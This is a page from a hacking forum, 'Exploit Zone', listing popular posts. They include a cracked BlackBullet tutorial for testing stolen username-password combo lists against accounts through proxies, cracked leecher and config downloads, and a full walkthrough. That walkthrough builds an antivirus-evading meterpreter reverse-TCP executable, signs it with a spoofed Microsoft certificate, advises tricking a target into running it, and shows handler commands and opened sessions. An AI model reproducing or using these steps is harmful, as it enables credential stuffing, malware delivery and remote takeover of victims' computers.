Jump to content
Under Attack Mode

we are under attack,
For 2 days we have been the target of DDOS attack by small ScriptKiddies.
We are deploying a solution to solve the problem
Please stay tunned !


If you encounter problems with the new theme please inform the staff

@AdminSec   @mister     @SC_z     @Naylor

Search In
  • More options...
Find results that contain...
Find results in...

Researchers Uncover Novel Way to De-anonymize Device IDs to Users' Biometrics

Researchers Uncover Novel Way to De-anonymize Device IDs to Users' Biometrics
Read more...

Microsoft Releases Patch for Wormable Bug That Threatens Corporate LANs

Microsoft Releases Patch for Wormable Bug That Threatens Corporate LANs
Read more...

Try challenges


Register & Join The Game

Break It

Welcome to Exploit Zone


Become a ninja in the shadow !

News
  • Welcome To Exploit Zone
  • The kingdom of knowledge sharing in hacking
  • New Updates ! Stay Tunned !
  • Share your knowledge here !
  • unlash your power on our challenges !
  • Become a ninja in the Shadow !

Leaderboard


Popular Content

Showing content with the highest reputation since 04/30/20 in all areas

  1. 2 points
    Hello, I present to you a small tool that I am well who is called userrecon it makes it possible to easily find all the sites which contains the defined username, this script makes it possible to find a username on: -instagram -Facebook -TWITTER -YOUTUBE -BLOGGER -GLOOGLE PLUS -REDDIT -WORDPRESS -PINTEREST -GITHUB -TUMBLR -FLICKR -STEAM -VIMEO - ETC ... Download : [Hidden Content]
  2. 2 points
    What is JWT ? [Hidden Content] So I hope you've learned from this post leave a like if you do 😁
  3. 1 point
    DOWNLOAD LINK : [Hidden Content] mirror 1 mirror 2 mirror 3 Hello today, I'm going to introduce BlackBullet and its new mode of operation! This software was not created by the community this is a crack so potentially bindd with a virus! Use this software via a virtual machine! What's blackbullet ? At the first opening, you have: We can see The BB File and a "Converter" !! Explanations: BB in version 2.0.2 works with Configs in ==> .ini (original) BB in version 2.1.6 works in config ==> .bbc (encrypted) You understand it, this Converter serves you: * Either to change a config .ini in .bbc, or from .bbc to .ini Go on, we continue ==> Open the folder ==> BlackBullet 2.1.6 Cracked In this Dossier, we find: A folder ==> Combos A folder ==> Configs A folder ==> Proxies So you can accommodate your own Combos and Proxies !! We have everything at hand ... VERY IMPORTANT !!! Check that you have the file ==> Launcher.exe !! If not look in your Anti Virus, it is possible that he quarantined it ... (Nothing to fear though, it's a fake!) B / Launch of BB Now we will launch BB, to use ==> Launcher.exe You have several windows that start !!! The !! You click on ==> Login And that's BB in its Version 2.1.6 !! Come on, let's see the top tabs already: I will detail: * Configs Your chosen config is there !! WordLists ==> Combos As on the picture, We will search for it (Add), we name it, The Type, Purpose = Mix and ==> Accept !! Result: * Proxies If your Proxies are loaded at the end of the Manipulation, that must give it !! At this level, you can check them if you wish !! I pass directly ... Last Tab ==> BruteForcer !! First load Config ==> Select CFG Then the Combo ==> Select List At this moment you must have this !! Check a Last Time: Config The Combo Number of Bots - Normally they are determined in Auto if the Config is well done, otherwise Regulate yourself Bots !! * Your Proxies will appear as soon as you click ==> on Start !! If everything went well !! You should have a BB that looks like this in a running state ... Last Explanation on the Infos which are All right !!! COMBOS: Total = The Number of Accounts that is Tested Hits = Your HITS !!!!! Free = The Accounts that are here, are usually Accounts that ask for to change the Pass, When Connecting. Bad = Bad Retries = As under Sentry, The Relaunch of the Software (Sort of Rééssaie !!) PROXIES: Total: The number of your proxies Alive: Those who are on the move Banned: Those who are banned Bad: Those who are Bad CPM: Combo Per Minute !! this often expresses the "Health" of your Config They are more or less high !! If it stays Zero ==> Config Tired or Dead !! Here is this tutorial ends, I hope to have helped you to like Black Bullet !!
  4. 1 point
    Here is a cracked version of Black leecher by ky0ox (from IH) (if you don't know what is it, it's like slayer leecher but there are steams keys and others) DL :[Hidden Content] Enjoy it
  5. 1 point
    I'm sharing you some configs, make your choice (the configs are not made by myself): [Hidden Content] (I will add some sometimes) Leave a Like
  6. 1 point
    Metasploit is the most popular tool used in pentesting. Metasploit tries to find weakness across your local network before an attacker does. This is the most common tool used by attacker’s to test security of operating system. In Kali Linux metasploit comes pre-installed with lots of payloads which are used to generate malicious executable’s to hack different platforms. But today we will show you a tool called Phantom Evasion which is used to generate FUD (Fully Undetectable) executable’s with msfvenom payload. According to developer Phantom Evasion main aim is to bypass antivirus detection or we can say Antivirus Evasion. Phantom Evasion has been tested on Kali Linux 2018.4 amd64). For cloning type git clone [Hidden Content] Type cd Phantom-Evasion Type chmod u+x phantom-evasion.py Type python3 phantom-evasion.py When running first time it may encounter some error but the tool will work perfectly. _ _ _ __ | |__ __ _ _ __ | |_ ___ _ __ ___ | '_ \| '_ \ / _` | '_ \| __/ _ \| '_ ` _ \ | |_) | | | | (_| | | | | || (_) | | | | | | | .__/|_| |_|\__,_|_| |_|\__\___/|_| |_| |_| |_| / _ \ \ / / _` / __| |/ _ \| '_ \ | __/\ V / (_| \__ \ | (_) | | | | \___| \_/ \__,_|___/_|\___/|_| |_| v2.0.1 ===================================================================== || [MAIN MENU]: || || || || || || [1] Windows modules || [5] Universal modules || || || || || [2] Linux modules || [6] Post-Exploitation modules || || || || || [3] OSX modules || [7] Update check || || || || || [4] Android modules || [0] Exit || || || || ===================================================================== [>] Please insert option: Type 1 [>] Please insert option: 1 [+] WINDOWS MODULES INDEX: [1] Shellcode Injection [2] Stager [3] Powershell / Wine-pyinstaller [0] Back [>] Please insert option: 2 Type 2 [+] WINDOWS x86 STAGER MODULES: [1] C meterpreter/reverse_TCP VirtualAlloc (C) [2] C meterpreter/reverse_TCP VirtualAlloc NoDirectCall GPAGMH (C) [3] C meterpreter/reverse_TCP HeapAlloc (C) [4] C meterpreter/reverse_TCP HeapAlloc NoDirectCall GPAGMH (C) [5] C meterpreter/reverse_HTTP VirtualAlloc (C) [6] C meterpreter/reverse_HTTP VirtualAlloc NoDirectCall GPAGMH (C) [7] C meterpreter/reverse_HTTP HeapAlloc (C) [8] C meterpreter/reverse_HTTP HeapAlloc NoDirectCall GPAGMH (C) [9] C meterpreter/reverse_HTTPS VirtualAlloc (C) [10] C meterpreter/reverse_HTTPS VirtualAlloc NoDirectCall GPAGMH (C) [11] C meterpreter/reverse_HTTPS HeapAlloc (C) [12] C meterpreter/reverse_HTTPS HeapAlloc NoDirectCall GPAGMH (C) [0] Back After selecting any payload it will display description of the payload & on what extension the payload will build. [+] MODULE DESCRIPTION: This Module generate and compile 32bit pure c meterpreter reverse tcp stagers. Require msfconsole multi/handler listener with payload set to windows/meterpreter/reverse_tcp [>] Memory allocation type: HEAP [>] TYPE: TCP [>] STATIC EVASION: Polymorphic source code [>] DYNAMIC EVASION: Resource consumption technique Sandbox-aware code [>] AUTOCOMPILE(cross platform): to EXE file Press Enter to continue: Type 192.168.1.6 (Listen/ Attacker’s IP address) [>] Please insert LHOST: 192.168.1.6 Type 443 (Listen/ Attacker’s Port) [>] Please insert LPORT: 443 Then enter filename : file [>] Please insert output filename: file Type n to create only single process in target computer. So it become less chance to get caught by the antivirus. [>] Spawn Multiple Processes: During target-side execution this will cause to spawn a maximum of 4 processes consequentialy. Only the last spawned process will reach the malicious section of code while the other decoy processes spawned before will executes only random junk code [>] Add multiple processes behaviour?(y/n): n Type Y [>] Generating C meterpreter stager [>] Compiling… [>] Strip strip is a GNU utility to "strip" symbols from object files. This is useful for minimizing their file size, streamlining them for distribution. It can also be useful for making it more difficult to reverse-engineer the compiled code. (Lower rate of detection) [>] Strip executable? (y/n): y The above query will minimize the malicious file size. Type y [>] Sign Executable Online Certificate spoofer & Executabe signer (Lower rate of detection) [>] Sign executable? (y/n): y Above query will sign the malicious file with default certificate comes with phantom evasion. You can use your own certificate or use it with Microsoft certificate which comes with phantom evasion. Type y Type 1 Certificates directory is not empty , use already existing certificate? (y/n): y [1] www.microsoft.com [2] Create new certificate [>] Select a Certificate or create a new one: 1 Type 1 [>] Select a Certificate or create a new one: 1 [>] Insert sign software description (default: Notepad Benchmark Util): [>] Signing file1.exe with osslsigncode… [>] Succeeded [<>] File saved in Phantom-Evasion folder After creating malicious code send the file to target. You can use any social engineering to trick your target. TESTING WINDOWS PLATFORM :- For testing we are using Windows 7 (32 Bit) with Windows Defender Disabled. Open the executable file using by pressing enter. For checking the payload. You can use metasploit multi handler which comes pre-installed in Kali Linux. Open another terminal & type msfconsole. Type use multi/handler msf > use multi/handler Type LHOST 192.168.1.6 (same as you entered in phantom evasion). Type LPORT 443 (same as you entered in phantom evasion). Type show options msf exploit(multi/handler) > set LHOST 192.168.1.6 LHOST => 192.168.1.6 msf exploit(multi/handler) > set LPORT 443 LPORT => 443 msf exploit(multi/handler) > show options Module options (exploit/multi/handler): Name Current Setting Required Description ---- --------------- -------- ----------- Payload options (windows/meterpreter/reverse_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none) LHOST 192.168.1.6 yes The listen address (an interface may be specified) LPORT 443 yes The listen port Exploit target: Id Name -- ---- 0 Wildcard Target Type run msf exploit(multi/handler) > run As malicious is already started in Windows 7 Professional 32 Bit. After typing run a new session will be created between attacker & target machines. Typesysinfo to check the target computer details. [] Started reverse TCP handler on 192.168.1.6:443 [] Sending stage (179779 bytes) to 192.168.1.9 [*] Meterpreter session 1 opened (192.168.1.6:443 -> 192.168.1.9:49250) at 2019-03-04 00:34:27 -0500 meterpreter > sysinfo Computer : WIN-31VSBP3FUQT OS : Windows 7 (Build 7601, Service Pack 1). Architecture : x86 System Language : en_US Domain : WORKGROUP Logged On Users : 1 Meterpreter : x86/windows meterpreter > Now you can manipulate the target using meterpreter command shell. Now for further testing we have used Windows 10 Enterprise 1809 (x64) with Windows Defender enabled. Open the malicious exe in Windows 10 machine. As you open the exe a new session will be created in multi/ handler. Type sysinfo to check the target computer details. [] Started reverse TCP handler on 192.168.1.6:443 [] Sending stage (179779 bytes) to 192.168.1.105 [*] Meterpreter session 2 opened (192.168.1.6:443 -> 192.168.1.105:49753) at 2019-03-04 02:26:30 -0500 meterpreter > sysinfo Computer : DESKTOP-I9LEAU8 OS : Windows 10 (Build 17758). Architecture : x64 System Language : en_US Domain : WORKGROUP Logged On Users : 2 Meterpreter : x86/windows Now you can manipulate the target using meterpreter command shell.
  7. 1 point
  8. 1 point
    What is XSS ? XSS stand for Cross site scripting, so basically it consists on injecting HTML code into a website. This vulnerability can be really critical, for example you can steal users sessions cookie, redirect the website page to a malicious one or even worst... [Hidden Content] Leave a Like ?

Announcements

×
×
  • Create New...